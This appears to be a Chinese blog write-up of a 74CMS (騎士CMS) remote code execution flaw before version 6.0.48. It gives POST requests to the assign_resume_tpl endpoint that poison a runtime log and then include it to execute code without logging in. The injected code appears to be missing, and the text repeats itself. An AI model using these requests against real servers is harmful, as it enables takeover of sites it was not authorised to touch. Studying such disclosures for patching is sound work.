騎士CMS模版註入_&文件包含getshell漏洞

# 騎士CMS模版註入 &文件包含getshell漏洞

==漏洞描述==
騎士cms人才系統,是一項基於PHP+MYSQL為核心開發的一套免費 + 開源專業人才網站系統。軟件具執行效率高、模板自由切換、後台管理功能方便等諸多優秀特點。

騎士 CMS 官方發布安全更新,修復了一處遠程代碼執行漏洞。由於騎士 CMS 某些函數存在過濾不嚴格,攻擊者通過構造惡意請求,配合文件包含漏洞可在無需登錄的情況下執行任意代碼,控制服務器。
==影響範圍==
騎士 CMS < 6.0.48 ==漏洞利用==
使用火狐hackbar發送POST:

http://192.168.31.61/upload/index.php?m=home&a=assign_resume_tpl
variable=1&tpl=/r/n
可以看到日誌記錄。
包含這條日誌,注意路徑和日誌名稱:
http://192.168.31.61/upload/index.php?m=home&a=assign_resume_tpl
variable=1&tpl=data/Runtime/Logs/Home/21_02_05.log


==漏洞描述==

騎士cms人才系統,是一項基於PHP+MYSQL為核心開發的一套免費 + 開源專業人才網站系統。軟件具執行效率高、模板自由切換、後台管理功能方便等諸多優秀特點。


騎士 CMS 官方發布安全更新,修復了一處遠程代碼執行漏洞。由於騎士 CMS 某些函數存在過濾不嚴格,攻擊者通過構造惡意請求,配合文件包含漏洞可在無需登錄的情況下執行任意代碼,控制服務器。
==影響範圍==

騎士 CMS < 6.0.48
==漏洞利用==

使用火狐hackbar發送POST:

http://192.168.31.61/upload/index.php?m=home&a=assign_resume_tpl
variable=1&tpl=/r/n

可以看到日誌記錄。

包含這條日誌,注意路徑和日誌名稱:
http://192.168.31.61/upload/index.php?m=home&a=assign_resume_tpl
variable=1&tpl=data/Runtime/Logs/Home/21_02_05.log
© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容